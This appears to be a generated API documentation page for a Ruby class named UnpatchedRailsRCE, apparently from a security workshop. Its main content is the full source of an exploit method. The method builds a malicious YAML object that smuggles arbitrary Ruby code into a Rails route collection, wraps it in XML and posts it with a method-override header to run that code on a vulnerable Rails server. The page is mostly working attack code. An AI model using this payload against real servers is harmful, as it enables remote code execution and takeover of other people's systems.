Class: HBS::SecurityWorkshop::UnpatchedRailsRCE

Inherits:

Object

Object
HBS::SecurityWorkshop::UnpatchedRailsRCE

show all

Includes:: Ronin::Network::HTTP, Ronin::UI::Output::Helpers

Defined in:: lib/hbs/security_workshop/unpatched_rails_rce.rb

Instance Method Summary collapse

#exploit(url, code) ⇒ Object

Instance Method Details

#exploit(url, code) ⇒ `Object`

# File 'lib/hbs/security_workshop/unpatched_rails_rce.rb', line 13

def exploit(url,code)
  escaped_code = "foo; #{code}\n__END__\n"
   
yaml = %{
--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection
? #{escaped_code.to_yaml.sub('--- ','').chomp}
: !ruby/object:OpenStruct
  table:
:defaults:
  :action: create
  :controller: foos
:required_parts: []
:requirements:
  :action: create
  :controller: foos
:segment_keys:
- :format
  modifiable: true
}.strip
   
xml = %{
<?xml version="1.0" encoding="UTF-8"?>
<exploit type="yaml">#{yaml}</exploit>
}.strip
   
   
  http_post(
    :url       => url,
    :headers   => {
      :content_type           => 'text/xml',
      :x_http_method_override => 'get'
    },
    :body      => xml
  )
end

Class: HBS::SecurityWorkshop::UnpatchedRailsRCE

Instance Method Summary collapse

Instance Method Details

#exploit(url, code) ⇒ Object

#exploit(url, code) ⇒ `Object`